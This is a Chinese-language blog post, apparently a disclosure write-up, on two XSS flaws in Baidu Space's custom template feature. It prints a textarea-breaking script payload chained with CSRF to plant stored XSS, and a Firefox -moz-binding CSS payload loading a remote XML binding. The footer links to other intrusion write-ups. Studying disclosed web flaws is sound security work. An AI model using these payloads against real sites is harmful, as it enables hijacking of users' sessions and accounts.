|
[组图]百度跨站漏洞谢幕篇
XSS 14: 百度空间保存自定义模板XSS漏洞
百度空间自定义模板是可以自己写CSS的。
自定义模板的界面是一个textarea,但是这个textarea标签是可以闭合的。(后来我发现monyer在blog上也指出过类似的问题。)
如果在保存模板处写入:
以下是引用片段:
</textarea><script>alert(/XSS/);</script>
那么实际上<textarea>就被闭合了,其后就能写入任意脚本。
实际上这属于一个Stored XSS,但是写入的是编辑模板的页面,没办法跨页面。
由于css的编号是可以直接从页面的代码里读出来的,所以编辑模板处是存在CSRF漏洞的
按照我在Day 02里提出的构造表单提交的办法,就可以直接把这个XSS写入到编辑模板页面
以后空间的主人去编辑模板的时候,就会被XSS
这也是一个从CSRF的危害扩大到XSS的例子。
所以请注意这是个危害非常大的漏洞。
XSS 15:百度空间自定义模板XSS漏洞(Firefox)
又是一个只针对Firefox的漏洞。
自定义模板是用<link>标签插入到首页去的。
在自定义模板中,构造特定的样式能够导致在Firefox下的XSS
构造如下:
| 以下是引用片段: BODY{-moz-binding:url(”http://ha.ckers.org/xssmoz.xml#xss”)} |
保存模板后,在firefox里访问首页,将造成跨站
xml文件代码如下:
| 以下是引用片段: <bindings> <binding id=”xss”> <implementation> <constructor>alert(’XSS’)</constructor> </implementation> </binding> </bindings> |
不过最近Firefox更新了(2.0.0.16),修补了这个XSS漏洞,所以这个漏洞以后就没用了。
漏洞讲完了,到扯淡时间了。一切都结束了吗?没有,才刚刚开始而已,不过那扯淡的将是下一篇了,稍后再发出来。
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
您现在的位置: